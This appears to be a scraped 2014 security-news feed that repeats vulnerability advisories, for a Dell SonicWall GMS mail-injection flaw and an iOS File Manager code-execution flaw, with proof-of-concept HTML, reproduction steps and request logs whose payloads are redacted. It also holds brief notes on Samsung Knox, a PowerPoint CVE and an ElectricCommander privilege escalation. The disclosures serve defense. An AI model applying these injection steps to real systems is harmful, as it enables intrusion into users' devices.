Searching around the internet to find specific information about Samsung Knox were not satisfying, as Samsung Knox is not open source. This was the reason to investigate Samsung Knox a little bit and lead to this analysis.
more here.............http://mobilesecurityares.blogspot.de/2014/10/why-samsung-knox-isnt-really-fort-knox.html
"KNOX Workspace container improves the user experience, providing security for enterprise data by creating a secure zone in the employee’s device for corporate applications, and encrypting enterprise data both at rest and in motion. KNOX Workspace container provides users with an isolated and secure environment within the mobile device, complete with its own home screen, launcher, applications and widgets for easier, more intuitive and safe operation. Applications and data inside the container are separated."
Searching around the internet to find specific information about Samsung Knox were not satisfying, as Samsung Knox is not open source. This was the reason to investigate Samsung Knox a little bit and lead to this analysis.
more here.............http://mobilesecurityares.blogspot.de/2014/10/why-samsung-knox-isnt-really-fort-knox.html
↧
Dell SonicWall GMS v7.2.x - Persistent Web Vulnerability
Document Title:
===============
Dell SonicWall GMS v7.2.x - Persistent Web Vulnerability
References (Source):
====================
http://www.vulnerability-lab.
Release Date:
=============
2014-10-21
Vulnerability Laboratory ID (VL-ID):
==============================
1222
Common Vulnerability Scoring System:
==============================
3
Product & Service Introduction:
==============================
Dell SonicWALL`s management and reporting solutions provide a comprehensive architecture for centrally creating and managing
security policies, providing real-time monitoring and alerts, and delivering intuitive compliance and usage reports, all from
a single management interface. Whether your organization is a small- or medium-sized business, a distributed enterprise or a
managed service provider, Dell™ SonicWALL™ offers software and appliance solutions to meet its needs.
The award-winning Dell SonicWALL Global Management System (GMS) provides organizations, distributed enterprises and service
providers with a flexible, powerful and intuitive solution to centrally manage and rapidly deploy SonicWALL firewall, anti-spam,
backup and recovery, and secure remote access solutions. Flexibly deployed as software, hardware—in the form of the Universal
Management Appliance (UMA)—or a virtual appliance, SonicWALL GMS also provides centralized real-time monitoring and comprehensive
policy and compliance reporting to drive down the cost of owning and managing SonicWALL security appliances. Multiple GMS
software, hardware, and virtual appliance agents, when deployed in a cluster, can scale to manage thousands of SonicWALL
security appliances. This makes GMS an ideal solution for small- to medium-sized businesses, enterprises and managed service
providers that have either single-site or distributed multi-site environments.
(Copy of the Vendor Homepage: http://www.sonicwall.com/emea/
Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered a persistent validation vulnerability in the official DELL SonicWall GMS v7.2.x appliance web-application.
Vulnerability Disclosure Timeline:
==============================
2014-10-21: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Affected Product(s):
====================
DELL
Product: SonicWall GMS Networks Appliance Application 7.2
Exploitation Technique:
=======================
Local
Severity Level:
===============
Medium
Technical Details & Description:
==============================
A persistent mail encoding web vulnerability has been discovered in the official DELL SonicWall GMS v7.2.x appliance web-application.
The security issue allows remote attackers with low privileged user account to inject own malicious script codes to the application-side
of the vulnerable service module.
The vulnerability is located in the `Console > Management > Settings > GMS Settings` module. Remote attackers and low privileged web-application
user accounts are able to inject own malicious script code context as notification value. The vulnerable user context with log files or information
notification messages (input) will be send to the internal web-server through the firewall. The data of the POST method request in the input, executes
without a secure encoding or a restriction on the input in the web-application appliance. The persistent execution of the script code occurs in the mail
notification that gets send by the appliances directly to users or via the interval count. In case of the second provided scenario the application generated
a pdf report with malicious script code in the mail body message.
The issue impact a risk to the full appliance web-application get compromised beause the send mail notifications is wrong encoded and the internal encode is
broken too. Regular the stored values must be secure encoded and parsed to prevent persistent executions in the appliance mails. The attack vector is persistent
on the application-side of the vulnerable service and the request method to inject the payload is POST.
The security risk of the persistent input validation web vulnerability is estimated as medium with a cvss (common vulnerability scoring system) count of 3.0.
Exploitation of the vulnerability requires a low privileged application user account and low user interaction. Successful exploitation of the vulnerability results
in session hijacking, persistent phishing attacks, persistent external redirect via mail and persistent manipulation of affected or connected module context.
Vulnerable Module(s):
[+] Console > Management > Settings > GMS Settings
Vulnerable Parameter(s):
[+] message body > table
Affected Service(s):
[+] admin@sonicwall.com (test > livedemo-admin@sonicwall.com)
Note: All other modules sending user values of non restricted input throught the appliance back. (logs, updates ...)
Proof of Concept (PoC):
=======================
The persistent mail encoding web vulnerability can be exploited by remote attackers with low privileged application user account and low user interaction.
For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.
Information of requirements:
- The template to send notification alerts needs to be send to the
Default html (example: http://gms.demo.sonicwall.com/
- The Console > Management > Settings section needs to be linked to the
appliance demo email address (example: livedemo-admin@sonicwall.com)
- The Alert of the notification with the pdf summery report of the
archiv needs to be redirected to the testmail like in our case
(bkm@evolution-sec.com)
PoC: message body > table
<html>
<head>
<title><iframe src=a>%20<iframe> <iframe src=a>%20<iframe></title>
<link rel="important stylesheet" href="chrome://messagebody/
</head>
<body>
<table border=0 cellspacing=0 cellpadding=0 width="100%" class="header-part1"><tr><td><
<a>%20<x></td></tr><tr><td><b>
<table border=0 cellspacing=0 cellpadding=0 width="100%" class="header-part2"><tr><td><
<[PERSISTENT INJECTED SCRIPT CODE!]>%20<iframe><br>
<br>
<br>
<br>
Powered by Dell SonicWALL GMS</body>
</html>
Reference(s):
http://gms.localhost:4872/
http://gms.localhost:4872/
http://gms.localhost:4872/
http://gms.localhost:4872/
Solution - Fix & Patch:
=======================
The vulnerability can be patched by a secure encode and parse of the input values in the message body context
Filter and restrict context of send mails through the application and the web-server of the sonicwall gms appliance.
The issue has already been patched by the dell security team in cooperation with the vulnerability-lab during the year 2014.
Security Risk:
==============
The security risk of the persistent mail encoding and validation web vulnerability is estimated as medium. (CVSS 3.0)
Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business
profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some
states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation
may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases
or trade with fraud/stolen material.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
Section: www.vulnerability-lab.com/dev - forum.vulnerability-db.com - magazine.vulnerability-db.com
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/
Feeds: vulnerability-lab.com/rss/rss.
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and
other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed),
modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com
Copyright © 2014 | Vulnerability Laboratory [Evolution Security]
===============
Dell SonicWall GMS v7.2.x - Persistent Web Vulnerability
References (Source):
====================
http://www.vulnerability-lab.
Release Date:
=============
2014-10-21
Vulnerability Laboratory ID (VL-ID):
==============================
1222
Common Vulnerability Scoring System:
==============================
3
Product & Service Introduction:
==============================
Dell SonicWALL`s management and reporting solutions provide a comprehensive architecture for centrally creating and managing
security policies, providing real-time monitoring and alerts, and delivering intuitive compliance and usage reports, all from
a single management interface. Whether your organization is a small- or medium-sized business, a distributed enterprise or a
managed service provider, Dell™ SonicWALL™ offers software and appliance solutions to meet its needs.
The award-winning Dell SonicWALL Global Management System (GMS) provides organizations, distributed enterprises and service
providers with a flexible, powerful and intuitive solution to centrally manage and rapidly deploy SonicWALL firewall, anti-spam,
backup and recovery, and secure remote access solutions. Flexibly deployed as software, hardware—in the form of the Universal
Management Appliance (UMA)—or a virtual appliance, SonicWALL GMS also provides centralized real-time monitoring and comprehensive
policy and compliance reporting to drive down the cost of owning and managing SonicWALL security appliances. Multiple GMS
software, hardware, and virtual appliance agents, when deployed in a cluster, can scale to manage thousands of SonicWALL
security appliances. This makes GMS an ideal solution for small- to medium-sized businesses, enterprises and managed service
providers that have either single-site or distributed multi-site environments.
(Copy of the Vendor Homepage: http://www.sonicwall.com/emea/
Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered a persistent validation vulnerability in the official DELL SonicWall GMS v7.2.x appliance web-application.
Vulnerability Disclosure Timeline:
==============================
2014-10-21: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Affected Product(s):
====================
DELL
Product: SonicWall GMS Networks Appliance Application 7.2
Exploitation Technique:
=======================
Local
Severity Level:
===============
Medium
Technical Details & Description:
==============================
A persistent mail encoding web vulnerability has been discovered in the official DELL SonicWall GMS v7.2.x appliance web-application.
The security issue allows remote attackers with low privileged user account to inject own malicious script codes to the application-side
of the vulnerable service module.
The vulnerability is located in the `Console > Management > Settings > GMS Settings` module. Remote attackers and low privileged web-application
user accounts are able to inject own malicious script code context as notification value. The vulnerable user context with log files or information
notification messages (input) will be send to the internal web-server through the firewall. The data of the POST method request in the input, executes
without a secure encoding or a restriction on the input in the web-application appliance. The persistent execution of the script code occurs in the mail
notification that gets send by the appliances directly to users or via the interval count. In case of the second provided scenario the application generated
a pdf report with malicious script code in the mail body message.
The issue impact a risk to the full appliance web-application get compromised beause the send mail notifications is wrong encoded and the internal encode is
broken too. Regular the stored values must be secure encoded and parsed to prevent persistent executions in the appliance mails. The attack vector is persistent
on the application-side of the vulnerable service and the request method to inject the payload is POST.
The security risk of the persistent input validation web vulnerability is estimated as medium with a cvss (common vulnerability scoring system) count of 3.0.
Exploitation of the vulnerability requires a low privileged application user account and low user interaction. Successful exploitation of the vulnerability results
in session hijacking, persistent phishing attacks, persistent external redirect via mail and persistent manipulation of affected or connected module context.
Vulnerable Module(s):
[+] Console > Management > Settings > GMS Settings
Vulnerable Parameter(s):
[+] message body > table
Affected Service(s):
[+] admin@sonicwall.com (test > livedemo-admin@sonicwall.com)
Note: All other modules sending user values of non restricted input throught the appliance back. (logs, updates ...)
Proof of Concept (PoC):
=======================
The persistent mail encoding web vulnerability can be exploited by remote attackers with low privileged application user account and low user interaction.
For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.
Information of requirements:
- The template to send notification alerts needs to be send to the
Default html (example: http://gms.demo.sonicwall.com/
- The Console > Management > Settings section needs to be linked to the
appliance demo email address (example: livedemo-admin@sonicwall.com)
- The Alert of the notification with the pdf summery report of the
archiv needs to be redirected to the testmail like in our case
(bkm@evolution-sec.com)
PoC: message body > table
<html>
<head>
<title><iframe src=a>%20<iframe> <iframe src=a>%20<iframe></title>
<link rel="important stylesheet" href="chrome://messagebody/
</head>
<body>
<table border=0 cellspacing=0 cellpadding=0 width="100%" class="header-part1"><tr><td><
<a>%20<x></td></tr><tr><td><b>
<table border=0 cellspacing=0 cellpadding=0 width="100%" class="header-part2"><tr><td><
<[PERSISTENT INJECTED SCRIPT CODE!]>%20<iframe><br>
<br>
<br>
<br>
Powered by Dell SonicWALL GMS</body>
</html>
Reference(s):
http://gms.localhost:4872/
http://gms.localhost:4872/
http://gms.localhost:4872/
http://gms.localhost:4872/
Solution - Fix & Patch:
=======================
The vulnerability can be patched by a secure encode and parse of the input values in the message body context
Filter and restrict context of send mails through the application and the web-server of the sonicwall gms appliance.
The issue has already been patched by the dell security team in cooperation with the vulnerability-lab during the year 2014.
Security Risk:
==============
The security risk of the persistent mail encoding and validation web vulnerability is estimated as medium. (CVSS 3.0)
Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business
profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some
states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation
may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases
or trade with fraud/stolen material.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
Section: www.vulnerability-lab.com/dev - forum.vulnerability-db.com - magazine.vulnerability-db.com
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/
Feeds: vulnerability-lab.com/rss/rss.
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and
other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed),
modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com
Copyright © 2014 | Vulnerability Laboratory [Evolution Security]
↧
File Manager v4.2.10 iOS - Code Execution Vulnerability
Document Title:
===============
File Manager v4.2.10 iOS - Code Execution Vulnerability
References (Source):
====================
http://www.vulnerability-lab.
Release Date:
=============
2014-10-21
Vulnerability Laboratory ID (VL-ID):
==============================
1343
Common Vulnerability Scoring System:
==============================
9
Product & Service Introduction:
==============================
Try a file manager that’s unmatched in functionality and reliability. It was created to manage your cloud services like GoogleDrive, Dropbox,
Box, OneDrive, Yandex.Disk, and network services like FTP, SFTP, SMB, WebDAV, DLNA, photo galleries and files on your device. Manage all of
your stored data like sub-folders - copy, move, rename or compress to archive your folders and files. It supports all possible archive
formats: Zip, Rar, 7z, tar, gz, bz2. You can protect your folders and files with a password and view photo, video and audio content, as well
as documents. This application will be a great help for everyday tasks. Copy a folder from one cloud service to any other - easy! Quickly move
a folder from an archive to a cloud service - easy! Copy your gallery to a network or cloud service - easy!
(Copy of the Homepage: https://itunes.apple.com/de/
Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research team discovered a code execution vulnerability in the official DevelSoftware LTD - File Manager v4.2.10 iOS mobile application.
Vulnerability Disclosure Timeline:
==============================
2014-10-21: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Affected Product(s):
====================
DevelSoftware LTD
Product: File Manager - iOS Mobile Web Application (Wifi) 4.2.10
Exploitation Technique:
=======================
Remote
Severity Level:
===============
Critical
Technical Details & Description:
==============================
A code execution vulnerability has been discovered in the official DevelSoftware LTD - File Manager v4.2.10 iOS mobile application.
The issue allows an attacker to compromise the application and connected device components by exploitation of a system specific code
execution vulnerability in the wifi interface.
The vulnerability is located in the `Create Folder` input field of the index.html wifi web interface. The function create the path value
without any protection or filter mechanism in the GET method request. Remote attackers are able to manipulate the GET method request by
usage of the `createdir?path=` parameter to compromise the application or device. The execution of the code occurs in the index.html file
next to the name output context of the wifi share file dir listing. The attack vector is located on the application-side of the mobile app
and the request method to inject is GET.
The security risk of the remote code execution web vulnerability is estimated as critical with a cvss (common vulnerability scoring system) count of 8.8
Exploitation of the remote code execution web vulnerability requires no privileged application user account (passwd default blank) or user interaction.
Successful exploitation of the code execution vulnerability results in mobile application compromise and connected or affected device component compromise.
Request Method(s):
[+] GET
Vulnerable Module(s):
[+] Create Folder
Vulnerable Parameter(s):
[+] createdir?path=(name)
Affected Module(s):
[+] Wifi Interface (index.html)
Proof of Concept (PoC):
=======================
The code execution vulnerability can be exploited by attackers in the same local wifi without user interaction or pass code authorization.
For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue.
1. Install the mobile app to your local iOS device (iphone or ipad) [https://itunes.apple.com/de/
2. Start the app and push in the left corner the wifi transfer button
3. Take another device or computer that allows you to access the wifi file transfer interface (localhost:80)
4. Now, inject own code as payload by usage of the create folder input field
Note: The input field requests the path value directly via GET method request without secure parse or encode
5. The code execution occurs directly after the inject in the index.html file of the web interface
6. Successful reproduce of the security vulnerability!
PoC: index.html (Name) [createdir?path=]
<fieldset class="buttonsFieldset">
<input disabled="" value="Download Files" class="buttons" id="loadFileButton" onclick="loadFileButtonClick()
<input value="Upload Files" class="buttons" id="uploadFilesButton" onclick="
<input value="Create Folder" class="buttons" id="createFolderButton" onclick="
<input disabled="" value="Rename" class="buttons" id="renameButton" onclick="renameButtonClick()" type="button">
<input disabled="" value="Delete" class="buttons" id="deleteButton" onclick="deleteButtonClick()" type="button">
<input value="Select All" class="buttons" id="selectAllButton" onclick="selectAllButtonClick(
<input value="Deselect All" class="buttons" id="unselectAllButton" onclick="
</fieldset>
<div class="separator"></div>
<div class="fileListTableContainer"
<table class="table" id="fileListTable"><tbody><tr id="fileListTable_-1" class="header">
<td id="fileListTable_-1_0" class="field">Name</td><td id="fileListTable_-1_1" class="field">Ext</td><td id="fileListTable_-1_2" class="field">Size</td></tr>
<tr index="0" id="fileListTable_0" class="row"><td index="0" field="name" id="fileListTable_0_0" class="cell">>-[CODE EXECUTION VULNERABILITY!]></td>
<td index="1" field="ext" id="fileListTable_0_1" class="cell">dir</td><td index="2" field="size" id="fileListTable_0_2" class="cell"></td></tr>
<tr index="1" id="fileListTable_1" class="row"><td index="0" field="name" id="fileListTable_1_0" class="cell">testfolder1</td><
id="fileListTable_1_1" class="cell">dir</td><td index="2" field="size" id="fileListTable_1_2" class="cell"></td></tr><tr index="2" id="fileListTable_2"
class="row"><td index="0" field="name" id="fileListTable_2_0" class="cell">testfolder2</td><
class="cell">dir</td><td index="2" field="size" id="fileListTable_2_2" class="cell"></td></tr></
--- PoC Session Logs [GET] ---
Status: 200[OK]
GET http://localhost:80/createdir?
Request Header:
Host[localhost:80]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0]
Accept[text/html,application/
Accept-Language[de,en-US;q=0.
Accept-Encoding[gzip, deflate]
Referer[http://localhost:80/
Connection[keep-alive]
Response Header:
Connection[Keep-Alive]
Content-Length[43]
Status: 200[OK]
GET http://localhost:80/-[CODE EXECUTION VULNERABILITY]; Load Flags[LOAD_DOCUMENT_URI ] Größe des Inhalts[-1] Mime Type[application/x-unknown-
Request Header:
Host[localhost:80]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0]
Accept[text/html,application/
Accept-Language[de,en-US;q=0.
Accept-Encoding[gzip, deflate]
Referer[http://localhost:80/
Connection[keep-alive]
Response Header:
Connection[Close]
Date[Sun, 19 Oct 2014 16:22:46 GMT]
Solution - Fix & Patch:
=======================
The vulnerability can be patched by a secure restriction and parse of the create folder input field. Encode also the vulnerable name value in the
index.html file to prevent application-side code execution attacks.
Security Risk:
==============
The security risk of the code execution web vulnerability in the path value is estimated as critical. (CVSS 8.8)
Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either
expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers
are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even
if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation
of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break
any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
Section: dev.vulnerability-db.com - forum.vulnerability-db.com - magazine.vulnerability-db.com
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/
Feeds: vulnerability-lab.com/rss/rss.
Programs: vulnerability-lab.com/submit.
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to
electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website
is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact
(admin@vulnerability-lab.com or research@vulnerability-lab.com
Copyright © 2014 | Vulnerability Laboratory [Evolution Security]
![]()
===============
File Manager v4.2.10 iOS - Code Execution Vulnerability
References (Source):
====================
http://www.vulnerability-lab.
Release Date:
=============
2014-10-21
Vulnerability Laboratory ID (VL-ID):
==============================
1343
Common Vulnerability Scoring System:
==============================
9
Product & Service Introduction:
==============================
Try a file manager that’s unmatched in functionality and reliability. It was created to manage your cloud services like GoogleDrive, Dropbox,
Box, OneDrive, Yandex.Disk, and network services like FTP, SFTP, SMB, WebDAV, DLNA, photo galleries and files on your device. Manage all of
your stored data like sub-folders - copy, move, rename or compress to archive your folders and files. It supports all possible archive
formats: Zip, Rar, 7z, tar, gz, bz2. You can protect your folders and files with a password and view photo, video and audio content, as well
as documents. This application will be a great help for everyday tasks. Copy a folder from one cloud service to any other - easy! Quickly move
a folder from an archive to a cloud service - easy! Copy your gallery to a network or cloud service - easy!
(Copy of the Homepage: https://itunes.apple.com/de/
Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research team discovered a code execution vulnerability in the official DevelSoftware LTD - File Manager v4.2.10 iOS mobile application.
Vulnerability Disclosure Timeline:
==============================
2014-10-21: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Affected Product(s):
====================
DevelSoftware LTD
Product: File Manager - iOS Mobile Web Application (Wifi) 4.2.10
Exploitation Technique:
=======================
Remote
Severity Level:
===============
Critical
Technical Details & Description:
==============================
A code execution vulnerability has been discovered in the official DevelSoftware LTD - File Manager v4.2.10 iOS mobile application.
The issue allows an attacker to compromise the application and connected device components by exploitation of a system specific code
execution vulnerability in the wifi interface.
The vulnerability is located in the `Create Folder` input field of the index.html wifi web interface. The function create the path value
without any protection or filter mechanism in the GET method request. Remote attackers are able to manipulate the GET method request by
usage of the `createdir?path=` parameter to compromise the application or device. The execution of the code occurs in the index.html file
next to the name output context of the wifi share file dir listing. The attack vector is located on the application-side of the mobile app
and the request method to inject is GET.
The security risk of the remote code execution web vulnerability is estimated as critical with a cvss (common vulnerability scoring system) count of 8.8
Exploitation of the remote code execution web vulnerability requires no privileged application user account (passwd default blank) or user interaction.
Successful exploitation of the code execution vulnerability results in mobile application compromise and connected or affected device component compromise.
Request Method(s):
[+] GET
Vulnerable Module(s):
[+] Create Folder
Vulnerable Parameter(s):
[+] createdir?path=(name)
Affected Module(s):
[+] Wifi Interface (index.html)
Proof of Concept (PoC):
=======================
The code execution vulnerability can be exploited by attackers in the same local wifi without user interaction or pass code authorization.
For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue.
1. Install the mobile app to your local iOS device (iphone or ipad) [https://itunes.apple.com/de/
2. Start the app and push in the left corner the wifi transfer button
3. Take another device or computer that allows you to access the wifi file transfer interface (localhost:80)
4. Now, inject own code as payload by usage of the create folder input field
Note: The input field requests the path value directly via GET method request without secure parse or encode
5. The code execution occurs directly after the inject in the index.html file of the web interface
6. Successful reproduce of the security vulnerability!
PoC: index.html (Name) [createdir?path=]
<fieldset class="buttonsFieldset">
<input disabled="" value="Download Files" class="buttons" id="loadFileButton" onclick="loadFileButtonClick()
<input value="Upload Files" class="buttons" id="uploadFilesButton" onclick="
<input value="Create Folder" class="buttons" id="createFolderButton" onclick="
<input disabled="" value="Rename" class="buttons" id="renameButton" onclick="renameButtonClick()" type="button">
<input disabled="" value="Delete" class="buttons" id="deleteButton" onclick="deleteButtonClick()" type="button">
<input value="Select All" class="buttons" id="selectAllButton" onclick="selectAllButtonClick(
<input value="Deselect All" class="buttons" id="unselectAllButton" onclick="
</fieldset>
<div class="separator"></div>
<div class="fileListTableContainer"
<table class="table" id="fileListTable"><tbody><tr id="fileListTable_-1" class="header">
<td id="fileListTable_-1_0" class="field">Name</td><td id="fileListTable_-1_1" class="field">Ext</td><td id="fileListTable_-1_2" class="field">Size</td></tr>
<tr index="0" id="fileListTable_0" class="row"><td index="0" field="name" id="fileListTable_0_0" class="cell">>-[CODE EXECUTION VULNERABILITY!]></td>
<td index="1" field="ext" id="fileListTable_0_1" class="cell">dir</td><td index="2" field="size" id="fileListTable_0_2" class="cell"></td></tr>
<tr index="1" id="fileListTable_1" class="row"><td index="0" field="name" id="fileListTable_1_0" class="cell">testfolder1</td><
id="fileListTable_1_1" class="cell">dir</td><td index="2" field="size" id="fileListTable_1_2" class="cell"></td></tr><tr index="2" id="fileListTable_2"
class="row"><td index="0" field="name" id="fileListTable_2_0" class="cell">testfolder2</td><
class="cell">dir</td><td index="2" field="size" id="fileListTable_2_2" class="cell"></td></tr></
--- PoC Session Logs [GET] ---
Status: 200[OK]
GET http://localhost:80/createdir?
Request Header:
Host[localhost:80]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0]
Accept[text/html,application/
Accept-Language[de,en-US;q=0.
Accept-Encoding[gzip, deflate]
Referer[http://localhost:80/
Connection[keep-alive]
Response Header:
Connection[Keep-Alive]
Content-Length[43]
Status: 200[OK]
GET http://localhost:80/-[CODE EXECUTION VULNERABILITY]; Load Flags[LOAD_DOCUMENT_URI ] Größe des Inhalts[-1] Mime Type[application/x-unknown-
Request Header:
Host[localhost:80]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0]
Accept[text/html,application/
Accept-Language[de,en-US;q=0.
Accept-Encoding[gzip, deflate]
Referer[http://localhost:80/
Connection[keep-alive]
Response Header:
Connection[Close]
Date[Sun, 19 Oct 2014 16:22:46 GMT]
Solution - Fix & Patch:
=======================
The vulnerability can be patched by a secure restriction and parse of the create folder input field. Encode also the vulnerable name value in the
index.html file to prevent application-side code execution attacks.
Security Risk:
==============
The security risk of the code execution web vulnerability in the path value is estimated as critical. (CVSS 8.8)
Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either
expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers
are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even
if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation
of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break
any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
Section: dev.vulnerability-db.com - forum.vulnerability-db.com - magazine.vulnerability-db.com
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/
Feeds: vulnerability-lab.com/rss/rss.
Programs: vulnerability-lab.com/submit.
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to
electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website
is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact
(admin@vulnerability-lab.com or research@vulnerability-lab.com
Copyright © 2014 | Vulnerability Laboratory [Evolution Security]
↧
Powerpoint Vulnerability (CVE-2014-4114) used in Malicious Spam
Following last week’s announcement of a zero-day vulnerability for PowerPoint (CVE-2014-4114), we suspected it would not be too long before we saw this attack being used via email attachments. So when this email with a PowerPoint attachment appeared in our spam traps, it kinda stuck out, as we don’t typically see a lot of PowerPoint attachments.
more here...........http://blog.spiderlabs.com/2014/10/powerpoint-vulnerability-cve-2014-4114-used-in-malicious-spam.html
more here...........http://blog.spiderlabs.com/2014/10/powerpoint-vulnerability-cve-2014-4114-used-in-malicious-spam.html
↧
↧
CVE-2014-7180 - ElectricCommander Local Privilege Escalation
Classification: //Dell SecureWorks/Confidential - Limited External
Distribution:
##############################
######
# * Title: ElectricCommander Local Privilege Escalation
# * Advisory ID: SWRX-2014-010
# * Advisory
URL: http://www.secureworks.
14-010/
# * Date published: Wednesday, October 22, 2014
# * CVE: CVE-2014-7180
# * CVSS v2 base score: 7.2
# * Date of last update: Wednesday, October 22, 2014
# * Vendors contacted: Electric Cloud, Inc.
# * Release mode: Coordinated
# * Discovered by: Sean Wright, Dell SecureWorks
##############################
######
Summary
ElectricCommander is a toolset that facilitates remote deployment of
environment configurations from
a centralized server to attached agents. Due to excessive file system
permissions on two Perl source
code files, an unprivileged local attacker can modify these files to insert
code. The attacker’s code is
then executed as the privileged user running these administrative tools.
------------------------------
------------------------------
Affected products
This vulnerability has been confirmed in version 4.2.4.71224 of
ElectricCommander.
------------------------------
------------------------------
Vendor information, solutions, and workarounds
This vulnerability has been addressed in later versions of the toolset.
ElectricCommander users should
upgrade to version 4.2.6 (and above) or version 5.0.3 (and above).
As an alternate manual workaround, users may set the file permissions to
become read-only after
installation of the RPM package management system.
------------------------------
------------------------------
Details
Multiple commander tools are installed with ElectricCommander, including
eccert and ecconfigure.
According to Electric Cloud documentation, eccert is a command line tool
used to manage the
ElectricCommander Certificate Authority and the certificates configured on
the ElectricCommander
system. ecconfigure is a command line tool that can change the configuration
values for any locally
installed ElectricCommander server, web, agent, or repository service. Both
of these tools involve
manipulating write-protected files, so they need to be run as a privileged
user.
------------------------------
------------------------------
Distribution:
##############################
######
# * Title: ElectricCommander Local Privilege Escalation
# * Advisory ID: SWRX-2014-010
# * Advisory
URL: http://www.secureworks.
14-010/
